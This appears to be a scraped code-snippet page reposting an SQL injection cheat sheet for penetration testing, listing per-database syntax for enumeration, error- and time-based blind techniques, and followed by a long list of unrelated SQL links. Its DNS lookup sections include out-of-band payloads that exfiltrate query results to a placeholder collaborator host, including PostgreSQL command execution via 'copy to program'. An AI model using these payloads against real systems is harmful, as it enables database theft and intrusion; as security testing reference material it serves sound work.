sql injection cheat sheet

Sql injection cheat sheet : is a powerful tool for web application penetration tests. It follows modular approach and it can be used for various tasks : post exploitation, database enumeration, data retrieval, etc.

String concatenation

on Jun 05, 2022
Oracle	'foo'||'bar'
Microsoft	'foo'+'bar'
PostgreSQL	'foo'||'bar'
MySQL	'foo' 'bar' [Note the space between the two strings]
CONCAT('foo','bar')

Add Comment

0

Substring

on Jun 05, 2022
Oracle	SUBSTR('foobar', 4, 2)
Microsoft	SUBSTRING('foobar', 4, 2)
PostgreSQL	SUBSTRING('foobar', 4, 2)
MySQL	SUBSTRING('foobar', 4, 2)

Add Comment

0

Comments

on Jun 05, 2022
Oracle	--comment
Microsoft	--comment
/*comment*/
PostgreSQL	--comment
/*comment*/
MySQL	#comment
-- comment [Note the space after the double dash]
/*comment*/

Add Comment

0

Database version

on Jun 05, 2022
Oracle	SELECT banner FROM v$version
SELECT version FROM v$instance
Microsoft	SELECT @@version
PostgreSQL	SELECT version()
MySQL	SELECT @@version

Add Comment

0

Database contents

on Jun 05, 2022
Oracle	SELECT * FROM all_tables
SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
Microsoft	SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
PostgreSQL	SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
MySQL	SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

Add Comment

0

Conditional errors

on Jun 05, 2022
Oracle	SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual
Microsoft	SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END
PostgreSQL	SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END
MySQL	SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')

Add Comment

0

Batched (or stacked) queries

on Jun 05, 2022
Oracle	Does not support batched queries.
Microsoft	QUERY-1-HERE; QUERY-2-HERE
PostgreSQL	QUERY-1-HERE; QUERY-2-HERE
MySQL	QUERY-1-HERE; QUERY-2-HERE

Add Comment

0

Time delays

on May 06, 2022
Oracle	dbms_pipe.receive_message(('a'),10)
Microsoft	WAITFOR DELAY '0:0:10'
PostgreSQL	SELECT pg_sleep(10)
MySQL	SELECT sleep(10)

Add Comment

0

DNS lookup

on Jun 05, 2022
Oracle	The following technique leverages an XML external entity (XXE) vulnerability to trigger a DNS lookup. The vulnerability has been patched but there are many unpatched Oracle installations in existence:
SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual

The following technique works on fully patched Oracle installations, but requires elevated privileges:
SELECT UTL_INADDR.get_host_address('BURP-COLLABORATOR-SUBDOMAIN')
Microsoft	exec master..xp_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a'
PostgreSQL	copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'
MySQL	The following techniques work on Windows only:
LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a')
SELECT ... INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'

Add Comment

0

DNS lookup with data exfiltration

on Jun 05, 2022
Oracle	SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual
Microsoft	declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.BURP-COLLABORATOR-SUBDOMAIN/a"')
PostgreSQL	create OR replace function f() returns void as $$
declare c text;
declare p text;
begin
SELECT into p (SELECT YOUR-QUERY-HERE);
c := 'copy (SELECT '''') to program ''nslookup '||p||'.BURP-COLLABORATOR-SUBDOMAIN''';
execute c;
END;
$$ language plpgsql security definer;
SELECT f();
MySQL	The following technique works on Windows only:
SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'

Add Comment

0

Hopefully above mentioned answers will setisfied your questions. If you have any queries, you can quete your answers or suggestions also.

SQL answers related to "sql injection cheat sheet"

View All SQL queries

SQL queries related to "sql injection cheat sheet"

sql injection cheat sheet how to prevent application from sql injection in codeigniter sql alter column name sql server https://www.jitendrazaa.com/blog/sql/sqlserver/export-documents-saved-as-blob-binary-from-sql-server/ sql update query get database list in sql server sql concat string with column value sql server get users oracle sql drop index sql insert inserted id sql server cast date dd/mm/yyyy pl/sql procedure example sql declare variable sql convert datetime to year month delete table sql sql server update c# example code key validation sql pl sql trigger determine if insert or update or delete finding duplicate column values in table with sql add column table sql default value get column name sql server sql query with replace function declare table variable sql server rename table sql server sql server add unique constraint get current month last date in sql server sql server alter column base64 encode sql server sql count duplicate rows SQL Integer devision convert utc to est sql sql server drop table if exists truncate delete and drop in sql oracle sql create user sql date format yyyy-mm-dd sql server to_date sql server to date sql convert string to date yyyymmdd sql convert string to date yyyymmddhhmmss sql print all names that start with a given letter sql server beginning of month copy table sql server t-sql disable system versioning sql query to get the number of rows in a table sql server 2016 split string sql select except null create table if not exists sql sql server concat string and int could not find driver (SQL: select * from information_schema.tables where table_schema = pics and table_name = migrations and table_type = 'BASE TABLE') sql show tables how to use group_concat in sql server sql count mysql run sql file sql substring sql oracle update multiple rows how to create table in sql sql syntax create timestamp column sql insert from excel sql where contains how to sort names in alphabetical order in sql id increment ms sql server sql to char function with date SQL: merging multiple row data in string How to View column names of a table in SQL sql update from select sql drop column sql datetime now get duplicate records in sql with in sql server sql server restore database add multiple field in table sql SQL DELETE download sql server for mac sql timestamp to date import sql file from laravel create user defined table type in sql date datatype in sql DB: in eloquent using sql order of sql sql delete column case when switch in SQL get tables in database sql replace null with 0 in sql remove default constraint sql server ms sql now update a row in sql in sql orcale sql change column type sql multiple insert postgres illuminate database queryexception could not find driver (sql select * from insert in to table sql sql server pivot rows to columns how to connect to xampp sql server on windows cmd t-sql update from select sql join on a subquery sql like case sensitive sql select execute table valued function in sql sql get last ID oracle sql copy table without data max in sql sql server today minus n data types in sql sql in buscar nombre de columna en todas las tablas sql server sql if empty then sql as w3schools sql foreign key how to set foreign key in sql server sql primary key how to write uppercase in sql how to get initials in sql sql counter column import sql file mysql commadn line how to export table data from mysql table in sql format sql server time stamp procedures in pl sql microsoft sql server like operator in sql unique element in sql left joing sql what is delete in sql how to update data in sql year sql server function get week day from date in sql sql is not null alter column sql server sql how to partition rank sql select inner join example sql describe sql find second highest salary employee count function in sql add multiple columns to table sql aliases in sql if in sql how to copy one table to other one in sql return columns from table sql sql delete duplicate rows but keep one sql server select rows by distinct column alter in sql sql limit order by describe table in sql join types in sql view t-sql mail configuration sql check same row how to find average value in sql sql where contains part of string oracle SQL developer UPDATE command in SQL get first monday of month sql sql like How to Add a Default Value to a Column in MS SQL Server mode in sql sql how to get courses that i have made prerequisites apt install sql server store unicode characters in sql varchar() fields sql server version control do you know sql like syntax in sql sql script to get a type task on jira datbase for 12 months how to get specific salary in sql How do I install microsoft SQL on my Mac? local vs global variables in sql t sql dynamic top n query sql table intermédiaire an exception occurred while executing a transact-sql statement or batch user,group or role already is not in sql server load utilities in sql server SQL print multiple variable oracle sql for each row create new databse sql automatically update database last seen datetime in sql tcl in sql group function in sql SQL Hello, [firstname] [lastname] sql view index what is auto increment in sql sql server roles and users sql query to find percentage of null values in a table sql padd let with zeros how to create an SQL save method in ruby sql commands in android sql types how to list all values of a column that start with a letter in sql modificar tipo de dato sql server sql truncate table referencing itself what is in operator in sql sql use with to get value counts and percentages entity framework connection string sql server Join In Sql Server sql select rows with simlar names coursera spark sql max count if there is no schema in sql update sql sintassi fetcht he leftmost word in a comma separated string in sql alter column datatype and length in table sql metada in sql oracle sql compile package

Browse Other Code Languages

CodeProZone